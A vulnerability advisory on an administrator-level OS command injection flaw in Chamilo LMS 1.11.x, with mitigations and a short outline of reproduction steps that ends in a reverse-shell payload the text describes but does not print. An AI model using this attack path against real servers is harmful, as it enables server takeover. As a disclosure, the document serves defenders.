OS Command Injection Vulnerability Key Information Severity: High CVSS Score: 7.1 Product: Chamilo LMS Version: 1.11.x Affected Versions: <=1.11.28 Patched Versions: 1.11.30 Vulnerability Details CVE-ID: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') Description: The application does not properly validate user input data before passing it to the operating system shell, allowing an attacker to execute arbitrary system commands. Vulnerable Component: Vulnerable Parameter: Exploitation Conditions Authorized User with Administrator Role: An authorized user with administrator privileges is required to exploit the vulnerability. Mitigation To prevent the execution of arbitrary commands: Implement whitelisting for input data filtering. Conduct security checks on both client-side and server-side. Use parameterization to separate transmitted data from commands. Perform a source code analysis to identify and replace potentially vulnerable and outdated methods. Research The vulnerability was discovered by Nikolay Archakov from Positive Technologies. Vulnerability Reproduction 1. Install the plugin. 2. Set up a MySQL server on the attacker's machine. 3. Create a user on the MySQL server. 4. Inject a payload into the parameter to execute commands. Example Payload The payload is used to download a malicious script that provides a reverse shell to the attacker. Conclusion The Chamilo LMS version 1.11.x is vulnerable to OS Command Injection, allowing an attacker to execute arbitrary commands on the server. The vulnerability can be mitigated by implementing proper input validation and security checks.